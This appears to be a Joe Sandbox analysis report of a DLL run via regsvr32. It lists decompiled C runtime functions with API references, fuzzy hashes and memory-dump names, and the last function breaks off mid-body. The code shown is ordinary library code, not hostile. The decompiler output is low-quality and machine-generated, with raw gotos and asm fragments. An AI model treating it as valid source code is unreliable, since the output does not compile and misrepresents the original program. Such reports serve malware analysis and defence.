Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000000018000612D
GetProcAddress.KERNEL32 ref: 0000000180006143
FreeLibrary.KERNEL32 ref: 000000018000616A

Strings

CorExitProcess, xrefs: 000000018000613C
mscoree.dll, xrefs: 0000000180006124

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

0x1800077fc
0x180007801
0x180007810
0x180007818
0x18000781d
0x180007824
0x180007829
0x18000782c
0x180007833
0x180007836
0x180007838
0x18000783d
0x18000783f
0x180007844
0x180007847
0x180007849
0x18000784d
0x18000784f
0x180007854
0x18000785b
0x180007860
0x180007863
0x180007865
0x180007869
0x18000786b
0x180007870
0x180007876
0x18000787d
0x180007882
0x180007885
0x180007889
0x18000788b
0x180007890
0x180007897
0x1800078b5

APIs

_set_statfp.LIBCMT ref: 0000000180007824
_set_statfp.LIBCMT ref: 000000018000783F
_set_statfp.LIBCMT ref: 000000018000785B
_set_statfp.LIBCMT ref: 0000000180007897

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 0000000180007E9D
FlsSetValue.KERNEL32 ref: 0000000180007EBC
FlsSetValue.KERNEL32 ref: 0000000180007EE4
FlsSetValue.KERNEL32 ref: 0000000180007EF5
FlsSetValue.KERNEL32 ref: 0000000180007F06

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}

0x180003800
0x180003803
0x180003807
0x18000380b
0x18000381a
0x18000381e
0x180003834
0x180003836
0x18000383b
0x180003848
0x18000384c
0x180003855
0x18000385e
0x180003867
0x180003870
0x180003874
0x180003884
0x18000388c
0x180003891
0x180003896
0x18000389b
0x1800038a2
0x1800038be

APIs

EncodePointer.KERNEL32 ref: 000000018000384C
_CallSETranslator.LIBVCRUNTIME ref: 000000018000389B

Strings

RCC, xrefs: 0000000180003869
MOC, xrefs: 0000000180003860

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0xc11a2227b184
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

0x18000d5b8
0x18000d5c6
0x18000d5ca
0x18000d5d1
0x18000d5d9
0x18000d5dd
0x18000d5e7
0x18000d5ee
0x18000d5f5
0x18000d5fc
0x18000d606
0x18000d60a
0x18000d618
0x18000d624
0x18000d629
0x18000d62d
0x18000d630
0x18000d633
0x18000d63d
0x18000d64a
0x18000d64f
0x18000d65c
0x18000d65f
0x18000d664
0x18000d667
0x18000d66e
0x18000d677
0x18000d67b
0x18000d683
0x18000d686
0x18000d689
0x18000d69c
0x18000d6af
0x18000d6ba
0x18000d6be
0x18000d6c8
0x18000d6cd
0x18000d6e1
0x18000d6ea
0x18000d6f0
0x18000d6f2
0x18000d6fc
0x18000d702
0x18000d708
0x18000d71d
0x18000d72a
0x18000d72f
0x18000d73b
0x18000d740
0x18000d74b
0x18000d759
0x18000d764
0x18000d766
0x18000d76a
0x18000d76e
0x18000d77b
0x18000d77d
0x18000d780
0x18000d783
0x18000d794
0x18000d79d
0x18000d7ab
0x18000d7ae
0x18000d7b6
0x18000d7bf
0x18000d7ca
0x18000d7d0
0x18000d7d6
0x18000d7da
0x18000d7e6
0x18000d7e8
0x18000d7eb
0x18000d7ee
0x18000d7f3
0x18000d7ff
0x18000d808
0x18000d80e
0x18000d811
0x18000d814
0x18000d818
0x18000d81d
0x18000d825
0x18000d82d
0x18000d834
0x18000d839
0x18000d83f
0x18000d844
0x18000d84e
0x18000d850
0x18000d860
0x18000d862
0x18000d86a
0x18000d873
0x18000d888
0x18000d88e
0x18000d891
0x18000d8a0
0x18000d8a8
0x18000d8ae
0x18000d8b1
0x18000d8b6
0x18000d8bb
0x18000d8c3
0x18000d8c7
0x18000d8cc
0x18000d8cf
0x18000d8d8
0x18000d8dd
0x18000d8e2
0x18000d8e8
0x18000d8f1
0x18000d907
0x18000d915
0x18000d91c
0x18000d926
0x18000d92d
0x18000d931
0x18000d93a
0x18000d93a
0x18000d93e
0x18000d94d
0x18000d957
0x18000d95d
0x18000d960
0x18000d96a
0x18000d97b
0x18000d983
0x18000d985
0x18000d997
0x18000d9a7
0x18000d9a9
0x18000d9ac
0x18000d9b1
0x18000d9b3
0x18000d9c8
0x18000d9cf
0x18000d9d8
0x18000d9da
0x18000d9de
0x18000d9e0
0x18000d9ed
0x18000d9f3
0x18000d9f6
0x18000d9f9
0x18000da01
0x18000da2c

APIs

GetConsoleOutputCP.KERNEL32 ref: 000000018000D637
WriteFile.KERNEL32 ref: 000000018000D8FF
WriteFile.KERNEL32 ref: 000000018000D945
GetLastError.KERNEL32 ref: 000000018000D9FB

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
